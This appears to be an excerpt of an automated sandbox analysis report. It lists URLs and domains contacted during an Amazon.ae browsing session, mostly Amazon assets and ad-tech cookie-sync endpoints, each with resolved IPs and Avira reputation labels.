    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:RP6015S40NY7Z1AX6ZEM$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295509.0%26id%3DRP6015S40NY7Z1AX6ZEM%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D10296%26pc%3D12737%26at%3D12737%26t%3D1724264943923%26pty%3DSearch%26spty%3DList%26pti%3Dundefined%26tid%3DRP6015S40NY7Z1AX6ZEM%26aftb%3D1%26lob%3D1:127370%Avira URL Cloudsafe
    https://eworkbookcloud.com0%Avira URL Cloudsafe
    https://eb2.3lift.com/xuid?mid=8341&xuid=Cg70z68XTYC0TDWS4yrLtA&dongle=az46&rdir=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DtripleliftHMT%26id%3D%24UID&gdpr_consent=0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_TCEE_Stationairy_400x400_EN._CB567012733_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/ef60c95b-8d7d-400d-9723-39a3458ba35a.mp4/pro0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/71F6CWfC-yL._AC_UL960_FMwebp_QL65_.jpg0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/I/21RZgaOpsqL._RC0%Avira URL Cloudsafe
    https://data.amazon.ae/api/marketplaces/A2VIGQ35RCS4UG/cart/carts/retail/items?ref=sr_atc_rt_add_31&0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/61MltGgbc4L._AC_UL320_.jpg0%Avira URL Cloudsafe
    https://data.amazon.ae/api/marketplaces/A2VIGQ35RCS4UG/cart/carts/retail/items?ref=sr_atc_rt_rmv_1&a0%Avira URL Cloudsafe
    https://interia.pl0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_Gold/xcm_banners_mena_440x300_coop_4col_phl-coolers_440x300_ae-en.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/81mSTCJf8rL._AC_UL320_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/71kXnq2XQiL._AC_SY200_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/61kj0CBNocL._AC_SY200_.jpg0%Avira URL Cloudsafe
    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:RP6015S40NY7Z1AX6ZEM$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295509.0%26id%3DRP6015S40NY7Z1AX6ZEM%26ctb%3D1%26sc0%3Daod-ingress-assets-load-time%26bb0%3D11245%26pc0%3D11245%26ld0%3D11245%26t0%3D1724264942431%26pty%3DSearch%26spty%3DList%26pti%3Dundefined%26tid%3DRP6015S40NY7Z1AX6ZEM%26aftb%3D1%26lob%3D1:112450%Avira URL Cloudsafe
    https://blackrockadvisorelite.it0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/S/sash/e0LnMbFWJC-TMQz.woff)0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/41IU10DZeDL._SR480,440_.jpg0%Avira URL Cloudsafe
    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:SX0TR1HXR3TVBG1JQK3B$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3DSX0TR1HXR3TVBG1JQK3B%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D1475%26pc%3D12399%26at%3D12399%26t%3D1724264979239%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D11601212031%26tid%3DSX0TR1HXR3TVBG1JQK3B%26aftb%3D1%26lob%3D1:123990%Avira URL Cloudsafe
    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:RP6015S40NY7Z1AX6ZEM$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295509.0%26id%3DRP6015S40NY7Z1AX6ZEM%26m%3D1%26sc%3Dcsa%3AbrowserQuiteFn%26pc%3D12642%26at%3D12642%26t%3D1724264943828%26csmtags%3Daui%7Caui%3Aajax%7CbrowserQuiteFn%26pty%3DSearch%26spty%3DList%26pti%3Dundefined%26tid%3DRP6015S40NY7Z1AX6ZEM%26aftb%3D1%26lob%3D1:126420%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259737_400x400_2X._CB617696541_.jpg0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_CL_Beautyappliances_400x400_EN._CB567012733_.jpg0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334867_186x116_1X_en_AE_1._SY116_CB597773556_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/71hwZS1q69L._AC_UL640_QL65_.jpg0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Price-U299-440x280.jpg0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871141_186x116_1X_en_AE._SY116_CB569183660_.jpg0%Avira URL Cloudsafe
    https://aax-eu.amazon-adsystem.com/s/ecm3?ex=mediarithmics&id=vec-997065325230%Avira URL Cloudsafe
    https://m.media-amazon.com/images/G/01/style-snap/close-large.png0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Fitness-Apparel-440x500.jpg0%Avira URL Cloudsafe
    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:SX0TR1HXR3TVBG1JQK3B$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3DSX0TR1HXR3TVBG1JQK3B%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D2828%26pc%3D9603%26at%3D9603%26t%3D1724264976443%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D11601212031%26tid%3DSX0TR1HXR3TVBG1JQK3B%26aftb%3D1%26lob%3D1:96020%Avira URL Cloudsafe
    https://commentcamarche.net0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Price-U499-440x0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/I/31bJewCvY-L.js0%Avira URL Cloudsafe
    https://aax-eu.amazon-adsystem.com/e/xsp/getAdj?placementId=a41eaf9d-2a3a-4755-9b85-43dc8c32cac2&src=518&rj=%7B%7D&slot=auto-left-advertising-1&rid=0101303bdabc4c01cc6316b4cb39fd37d0ef69e5c99e4e3dad870bf325de8a77398b&callback=aax_xsp_render_ad0%Avira URL Cloudsafe
    https://blog.ameba.jp0%Avira URL Cloudsafe
    https://idbs-staging.com0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/S/sash/prp2-N9d2Q$gDX5.gif)0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Indoor-sports-T0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/71GjIV309kL._AC_UL320_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/S/sash/5uJUWEszo9hoRiT.png);background-size:contain0%Avira URL Cloudsafe
    https://completion.amazon.com0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Indoor-sports-C0%Avira URL Cloudsafe
    https://ib.adnxs.com/bounce?%2Fsetuid%2Fa9%3Fentity%3D188%26code%3DP_gLxs6dS0mJS9bg2U7X_A%26redir%3Dhttps%253A%252F%252Faax-eu.amazon-adsystem.com%252Fs%252Fecm3%253Fex%253DxandrHMT%2526id%253D%2524UID%26gdpr_consent%3D0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/L2-Top-brands-Wilson-750x300.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/61za6jnk1GL._AC_SY200_.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/31N-r+VYSWL.js0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/717u+E-LU6L._AC_UL320_.jpg0%Avira URL Cloudsafe
    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:RP6015S40NY7Z1AX6ZEM$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295509.0%26id%3DRP6015S40NY7Z1AX6ZEM%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D1936%26pc%3D12737%26at%3D12737%26t%3D1724264943923%26pty%3DSearch%26spty%3DList%26pti%3Dundefined%26tid%3DRP6015S40NY7Z1AX6ZEM%26aftb%3D1%26lob%3D1:127370%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Indoor-sports-B0%Avira URL Cloudsafe
    https://cm.g.doubleclick.net/pixel?google_nid=medr&google_cm&key=GOO&process_consent=T&action=GET_ID&opid=goo&etid=&domid=1106&ops=apx0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/61pSl2mowNL._AC_SY200_.jpg0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Activities-Swimming-440x500.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/41YtSb5uAGL._SR240,220_.jpg0%Avira URL Cloudsafe
    https://uipus.semasio.net/amazon/1/get?_url=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dsemasio%26id%3D%24%7BUIPID%28%29%7D0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/S/sash/WOnTLzkiaEccV7F.woff20%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Activities-Cycling-440x500.jpg0%Avira URL Cloudsafe
    https://m.media-amazon.com/images/G/01/ad-feedback/info_icon_1Xsprite.png);background-position:00%Avira URL Cloudsafe
    https://m.media-amazon.com/images/I/71kMkDkj2LL._AC_UL320_.jpg0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/I/31fNEss5igL.css?AUIClients/DetailPageAllOffersDisplayAssets0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_outdoors_silver/xcm_banners_mena_440x400_coop_6col_phl-shalimar_440x400_ae-en.jpg0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334872_186x116_1X_en_AE_3._SY116_CB597773556_.jpg0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/I/0152SLDk8CL.js?AUIClients/OctopusBrowsePageAssets0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Outdoor-sports-Football-440x500.jpg0%Avira URL Cloudsafe
    https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_outdoors_silver/xcm_banners_mena_440x400_coop_6col_phl-egardenkart_440x400_ae-en.jpg0%Avira URL Cloudsafe
    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:SX0TR1HXR3TVBG1JQK3B$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3DSX0TR1HXR3TVBG1JQK3B%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D8173%26pc%3D12400%26at%3D12400%26t%3D1724264979240%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D11601212031%26tid%3DSX0TR1HXR3TVBG1JQK3B%26aftb%3D1%26lob%3D1:123990%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    d1lxz4vuik53pc.cloudfront.net
    18.66.107.69
    truefalse
      unknown
      d2u28gf9o4d1cv.cloudfront.net
      18.239.94.6
      truefalse
        unknown
        ghd.dultzman.ru
        188.114.97.3
        truefalse
          unknown
          eu-eb2.3lift.com
          76.223.111.18
          truefalse
            unknown
            crb.kargo.com
            54.93.149.240
            truefalse
              unknown
              cdnjs.cloudflare.com
              104.17.25.14
              truetrue
                unknown
                cm.g.doubleclick.net
                142.250.185.162
                truefalse
                  unknown
                  www.google.com
                  142.250.185.132
                  truefalse
                    unknown
                    a33d5916f98192760c994c04dda69ded2.profile.cdg55-p2.cloudfront.net
                    18.245.200.147
                    truefalse
                      unknown
                      star-mini.c10r.facebook.com
                      157.240.253.35
                      truefalse
                        unknown
                        us-u.openx.net
                        35.244.159.8
                        truefalse
                          unknown
                          pugm-lhrc.pubmnet.com
                          185.64.190.78
                          truefalse
                            unknown
                            uip.semasio.net
                            77.243.51.122
                            truefalse
                              unknown
                              edger-edger-4e3vcwvnek77-1367313377.us-east-2.elb.amazonaws.com
                              13.59.80.43
                              truefalse
                                unknown
                                sync.rfp.fout.jp
                                35.186.196.148
                                truefalse
                                  unknown
                                  euw-ice.360yield.com
                                  52.31.116.213
                                  truefalse
                                    unknown
                                    sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com
                                    52.211.16.43
                                    truefalse
                                      unknown
                                      7czh8.crimiti.com
                                      188.114.96.3
                                      truefalse
                                        unknown
                                        envoy-hl.envoy-csync1.core-b8mf.ov1o.com
                                        34.1.230.181
                                        truefalse
                                          unknown
                                          ssum-sec.casalemedia.com
                                          104.18.36.155
                                          truefalse
                                            unknown
                                            rd.frontend.weborama.fr
                                            35.190.24.218
                                            truefalse
                                              unknown
                                              googleads.g.doubleclick.net
                                              172.217.18.98
                                              truefalse
                                                unknown
                                                unagi-na.amazon.com
                                                44.199.181.222
                                                truefalse
                                                  unknown
                                                  sync.sxp.smartclip.net
                                                  35.186.194.101
                                                  truefalse
                                                    unknown
                                                    tagr-pixel-nginx-odr-euw4.mookie1.com
                                                    34.160.236.64
                                                    truefalse
                                                      unknown
                                                      public-prod-dspcookiematching.dmxleo.com
                                                      188.65.124.66
                                                      truefalse
                                                        unknown
                                                        user-data-eu.bidswitch.net
                                                        35.214.149.91
                                                        truefalse
                                                          unknown
                                                          usersync.gumgum.com
                                                          34.247.233.198
                                                          truefalse
                                                            unknown
                                                            ad4e487cdd5709cc3620784412a14d5f0.profile.bcn50-p2.cloudfront.net
                                                            18.172.223.132
                                                            truefalse
                                                              unknown
                                                              c.media-amazon.com
                                                              18.239.99.145
                                                              truefalse
                                                                unknown
                                                                dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com
                                                                52.31.157.181
                                                                truefalse
                                                                  unknown
                                                                  rtb-csync-euw2.smartadserver.com
                                                                  164.132.25.185
                                                                  truefalse
                                                                    unknown
                                                                    a.nel.cloudflare.com
                                                                    35.190.80.1
                                                                    truefalse
                                                                      unknown
                                                                      d5glw3nnbe3pc.cloudfront.net
                                                                      18.239.102.131
                                                                      truefalse
                                                                        unknown
                                                                        completion.amazon.co.uk
                                                                        3.253.168.183
                                                                        truefalse
                                                                          unknown
                                                                          s.amazon-adsystem.com
                                                                          52.46.143.56
                                                                          truefalse
                                                                            unknown
                                                                            aax-eu.amazon-adsystem.com
                                                                            54.239.33.159
                                                                            truefalse
                                                                              unknown
                                                                              href.li
                                                                              192.0.78.27
                                                                              truefalse
                                                                                unknown
                                                                                media.amazon.map.fastly.net
                                                                                151.101.1.16
                                                                                truefalse
                                                                                  unknown
                                                                                  completion.amazon.com
                                                                                  44.215.128.78
                                                                                  truefalse
                                                                                    unknown
                                                                                    aax-eu-retail-direct.amazon-adsystem.com
                                                                                    52.95.121.195
                                                                                    truefalse
                                                                                      unknown
                                                                                      unagi-eu.amazon.com
                                                                                      67.220.226.187
                                                                                      truefalse
                                                                                        unknown
                                                                                        guiltysociety.com
                                                                                        69.49.245.172
                                                                                        truefalse
                                                                                          unknown
                                                                                          dsum-sec.casalemedia.com
                                                                                          104.18.36.155
                                                                                          truefalse
                                                                                            unknown
                                                                                            adserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.com
                                                                                            3.121.49.98
                                                                                            truefalse
                                                                                              unknown
                                                                                              pug-ams-bc.pubmnet.com
                                                                                              198.47.127.205
                                                                                              truefalse
                                                                                                unknown
                                                                                                lb.mediarithmics.com
                                                                                                54.36.150.187
                                                                                                truefalse
                                                                                                  unknown
                                                                                                  adserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.com
                                                                                                  18.196.77.193
                                                                                                  truefalse
                                                                                                    unknown
                                                                                                    ib.anycast.adnxs.com
                                                                                                    185.89.210.82
                                                                                                    truefalse
                                                                                                      unknown
                                                                                                      load-euw1.exelator.com
                                                                                                      54.78.254.47
                                                                                                      truefalse
                                                                                                        unknown
                                                                                                        dlsq0ztllwnya.cloudfront.net
                                                                                                        52.222.236.76
                                                                                                        truefalse
                                                                                                          unknown
                                                                                                          edge.gycpi.b.yahoodns.net
                                                                                                          87.248.119.251
                                                                                                          truefalse
                                                                                                            unknown
                                                                                                            endpoint.prod.eu-west-1.forester.a2z.com
                                                                                                            34.251.147.163
                                                                                                            truefalse
                                                                                                              unknown
                                                                                                              match-eu-central-1-ecs.sharethrough.com
                                                                                                              18.184.119.72
                                                                                                              truefalse
                                                                                                                unknown
                                                                                                                uipus.semasio.net
                                                                                                                50.57.31.206
                                                                                                                truefalse
                                                                                                                  unknown
                                                                                                                  images-na.ssl-images-amazon.com
                                                                                                                  unknown
                                                                                                                  unknownfalse
                                                                                                                    unknown
                                                                                                                    ads.stickyadstv.com
                                                                                                                    unknown
                                                                                                                    unknownfalse
                                                                                                                      unknown
                                                                                                                      audex.userreport.com
                                                                                                                      unknown
                                                                                                                      unknownfalse
                                                                                                                        unknown
                                                                                                                        unagi.amazon.ae
                                                                                                                        unknown
                                                                                                                        unknownfalse
                                                                                                                          unknown
                                                                                                                          csync.loopme.me
                                                                                                                          unknown
                                                                                                                          unknownfalse
                                                                                                                            unknown
                                                                                                                            lm.serving-sys.com
                                                                                                                            unknown
                                                                                                                            unknownfalse
                                                                                                                              unknown
                                                                                                                              redirect.prod.experiment.routing.cloudfront.aws.a2z.com
                                                                                                                              unknown
                                                                                                                              unknownfalse
                                                                                                                                unknown
                                                                                                                                images-eu.ssl-images-amazon.com
                                                                                                                                unknown
                                                                                                                                unknownfalse
                                                                                                                                  unknown
                                                                                                                                  odr.mookie1.com
                                                                                                                                  unknown
                                                                                                                                  unknownfalse
                                                                                                                                    unknown
                                                                                                                                    cookie-matching.mediarithmics.com
                                                                                                                                    unknown
                                                                                                                                    unknownfalse
                                                                                                                                      unknown
                                                                                                                                      pixel.rubiconproject.com
                                                                                                                                      unknown
                                                                                                                                      unknownfalse
                                                                                                                                        unknown
                                                                                                                                        c1.adform.net
                                                                                                                                        unknown
                                                                                                                                        unknownfalse
                                                                                                                                          unknown
                                                                                                                                          198.187.3.20.in-addr.arpa
                                                                                                                                          unknown
                                                                                                                                          unknownfalse
                                                                                                                                            unknown
                                                                                                                                            sync-amazon.ads.yieldmo.com
                                                                                                                                            unknown
                                                                                                                                            unknownfalse
                                                                                                                                              unknown
                                                                                                                                              www.amazon.ae
                                                                                                                                              unknown
                                                                                                                                              unknownfalse
                                                                                                                                                unknown
                                                                                                                                                usermatch.krxd.net
                                                                                                                                                unknown
                                                                                                                                                unknownfalse
                                                                                                                                                  unknown
                                                                                                                                                  uipglob.semasio.net
                                                                                                                                                  unknown
                                                                                                                                                  unknownfalse
                                                                                                                                                    unknown
                                                                                                                                                    m.media-amazon.com
                                                                                                                                                    unknown
                                                                                                                                                    unknownfalse
                                                                                                                                                      unknown
                                                                                                                                                      image6.pubmatic.com
                                                                                                                                                      unknown
                                                                                                                                                      unknownfalse
                                                                                                                                                        unknown
                                                                                                                                                        match.sharethrough.com
                                                                                                                                                        unknown
                                                                                                                                                        unknownfalse
                                                                                                                                                          unknown
                                                                                                                                                          loadus.exelator.com
                                                                                                                                                          unknown
                                                                                                                                                          unknownfalse
                                                                                                                                                            unknown
                                                                                                                                                            rtb-csync.smartadserver.com
                                                                                                                                                            unknown
                                                                                                                                                            unknownfalse
                                                                                                                                                              unknown
                                                                                                                                                              image2.pubmatic.com
                                                                                                                                                              unknown
                                                                                                                                                              unknownfalse
                                                                                                                                                                unknown
                                                                                                                                                                capi.connatix.com
                                                                                                                                                                unknown
                                                                                                                                                                unknownfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  aax-eu.amazon.ae
                                                                                                                                                                  unknown
                                                                                                                                                                  unknownfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    aan.amazon.ae
                                                                                                                                                                    unknown
                                                                                                                                                                    unknownfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      dpm.demdex.net
                                                                                                                                                                      unknown
                                                                                                                                                                      unknownfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        fls-eu.amazon.ae
                                                                                                                                                                        unknown
                                                                                                                                                                        unknownfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          x.bidswitch.net
                                                                                                                                                                          unknown
                                                                                                                                                                          unknownfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            www.facebook.com
                                                                                                                                                                            unknown
                                                                                                                                                                            unknownfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              beacon.krxd.net
                                                                                                                                                                              unknown
                                                                                                                                                                              unknownfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                tags.bluekai.com
                                                                                                                                                                                unknown
                                                                                                                                                                                unknownfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  pbs.yahoo.com
                                                                                                                                                                                  unknown
                                                                                                                                                                                  unknownfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    bs.serving-sys.com
                                                                                                                                                                                    unknown
                                                                                                                                                                                    unknownfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      ib.adnxs.com
                                                                                                                                                                                      unknown
                                                                                                                                                                                      unknownfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        match.360yield.com
                                                                                                                                                                                        unknown
                                                                                                                                                                                        unknownfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          amazon.partners.tremorhub.com
                                                                                                                                                                                          unknown
                                                                                                                                                                                          unknownfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            completion.amazon.ae
                                                                                                                                                                                            unknown
                                                                                                                                                                                            unknownfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              eb2.3lift.com
                                                                                                                                                                                              unknown
                                                                                                                                                                                              unknownfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                https://m.media-amazon.com/images/I/71U06Q9P9YL._AC_UL320_.jpgfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Smartwatch_1x._SY116_CB659040198_.jpgfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:SX0TR1HXR3TVBG1JQK3B$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295396.0%26id%3DSX0TR1HXR3TVBG1JQK3B%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D55%26pc0%3D230%26ld0%3D230%26t0%3D1724264967070%26sc1%3Dportal-bb%26pc1%3D16%26ld1%3D17%26t1%3D1724264966927%26sc2%3Daui%3Asw%3Apage_proxy%3Arequest_feature_tags%26bb2%3D230%26pc2%3D4237%26ld2%3D4237%26t2%3D1724264971077%26sc3%3Doctopus-search-result-card_apb-browse_0%26bb3%3D955%26be3%3D1232%26pc3%3D7173%26ld3%3D7173%26t3%3D1724264974013%26sc4%3DcsmCELLSframework%26bb4%3D1287%26pc4%3D1287%26ld4%3D1287%26t4%3D1724264968127%26sc5%3DcsmCELLSpdm%26bb5%3D1287%26pc5%3D1292%26ld5%3D1292%26t5%3D1724264968132%26sc6%3DcsmCELLSvpm%26bb6%3D1293%26pc6%3D1293%26ld6%3D1293%26t6%3D1724264968133%26sc7%3DcsmCELLSfem%26bb7%3D1293%26pc7%3D1293%26ld7%3D1293%26t7%3D1724264968133%26sc8%3Due_sushi_v1%26bb8%3D1294%26pc8%3D1295%26ld8%3D1295%26t8%3D1724264968135%26ctb%3D1:9563false
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/I/21RZgaOpsqL._RC%7C01jGK8CGXTL.css,01LNhrqAZmL.css,11mqgJVSK9L.css,01+6LDwsu8L.css,01ixfc-7StL.css,11ahlU8GWXL.css,01+neHskhqL.css,01U2pA95KSL.css,01fn6WRzO6L.css,01Sqn3dOuBL.css,01KrVAe0PrL.css,31wUat9O8SL.css,31gMGQBDl3L.css,01mP5ZKi0aL.css,01mEWw4285L.css,31FHXBkYr7L.css,11VKiAMd89L.css,21K0oo63ZeL.css,11E6-iRIJOL.css,01K0fSFz6eL.css,014eilLW+IL.css,01MU0Cb7yFL.css,01jaS0ue2bL.css,01Gjv7o0taL.css,019L5P4oPhL.css_.css?AUIClients/SearchPartnerAssetsfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://aax-eu.amazon-adsystem.com/s/ecm3?ex=indexHMT&id=ZsYx9dHM6rkAAEAZATd5iQAAfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://images-na.ssl-images-amazon.com/images/G/01/x-locale/common/grey-pixel.giffalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://aax-eu.amazon-adsystem.com/s/ecm3?ex=improvedigitalHMT&id=eab38052-3123-4242-b53f-8de88eb09882&gdpr_consent=false
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213331_UAE_3151168_153x125_en_AE._SY116_CB428587699_.jpgfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://m.media-amazon.com/images/I/31OyASKbVLL.jsfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://m.media-amazon.com/images/I/31EO3Wv+aeL._SR240,220_.jpgfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Earphones_1x._SY116_CB659040113_.jpgfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://m.media-amazon.com/images/I/51Ma-nfVD-L._AC_SY200_.jpgfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://m.media-amazon.com/images/I/81BY-cAOlCL._AC_QL10_SX160_SY600_FMwebp_.jpgfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://m.media-amazon.com/images/I/41daFqDf-bL._SR240,220_.jpgfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://cm.g.doubleclick.net/pixel?google_nid=a9eu&google_cm=&ex=doubleclick.net&gdpr_consent=&google_tc=false
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://m.media-amazon.com/images/I/91rNDaUuWZL.jsfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://cookie-matching.mediarithmics.com/input?key=GOO&key=GOO&action=GET_ID&opid=goo&etid=&domid=1106&ops=apx&google_gid=CAESELPyf_eKC0xl1BTvcv1gIuY&google_cver=1false
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://m.media-amazon.com/images/I/61BpJ-+2UGL._AC_SY200_.jpgfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://m.media-amazon.com/images/I/71oeOVwPQ-L._AC_UL320_.jpgfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://www.amazon.ae/rd/uedata?rid=APAVCQJMFK78QJEV1PMZ&sid=261-8635865-4706955&rx=6Er0okjb5uYy04ZZ97hxbAfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://m.media-amazon.com/images/I/715CW0XxRBL._AC_UL320_.jpgfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
